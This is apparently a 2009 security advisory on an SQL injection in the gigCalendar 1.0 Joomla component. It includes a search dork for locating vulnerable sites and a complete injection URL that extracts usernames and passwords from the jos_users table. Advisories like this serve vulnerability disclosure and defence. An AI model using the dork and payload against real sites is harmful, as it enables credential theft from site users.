gigCalendar 1.0 (banddetails.php) Joomla Component SQL Injection

2009.02.27
Risk: Medium
Local: No
Remote: Yes
CWE: CWE-89


CVSS Base Score: 6.8/10
Impact Subscore: 6.4/10
Exploitability Subscore: 8.6/10
Exploit range: Remote
Attack complexity: Medium
Authentication: No required
Confidentiality impact: Partial
Integrity impact: Partial
Availability impact: Partial

******* Salvatore "drosophila" Fresta ******* Application: gigCalendar Joomla Component 1.0 http://joomlacode.org/gf/project/gigcalendar/ Version: gigCalendar 1.0 Bug: * SQL Injection Exploitation: Remote Dork: inurl:"index.php?option=com_gigcal" Date: 21 Feb 2009 Discovered by: Salvatore "drosophila" Fresta Author: Salvatore "drosophila" Fresta e-mail: drosophilaxxx (at) gmail (dot) com [email concealed] ************************************************* - BUGS SQL Injection: Requisites: magic_quotes_gpc = off File affected: banddetails.php This bug allows a guest to view username and password of a registered user. http://www.site.com/path/index.php?option=com_gigcal&task=details&gigcal _bands_id=-1' UNION ALL SELECT 1,2,3,4,5,concat('username: ', username),concat('password: ', password),NULL,NULL,NULL,NULL,NULL,NULL FROM jos_users%23 ************************************************* -- Salvatore "drosophila" Fresta CWNP444351

References:

http://xforce.iss.net/xforce/xfdb/48865
http://www.securityfocus.com/bid/33863
http://www.securityfocus.com/bid/33859
http://www.securityfocus.com/archive/1/archive/1/501176/100/0/threaded
http://www.securityfocus.com/archive/1/archive/1/501175/100/0/threaded
http://www.securityfocus.com/archive/1/archive/1/501174/100/0/threaded


Vote for this issue:
50%
50%


 

Thanks for you vote!


 

Thanks for you comment!
Your message is in quarantine 48 hours.

Comment it here.


(*) - required fields.  
{{ x.nick }} | Date: {{ x.ux * 1000 | date:'yyyy-MM-dd' }} {{ x.ux * 1000 | date:'HH:mm' }} CET+1
{{ x.comment }}

Copyright 2024, cxsecurity.com

 

Back to Top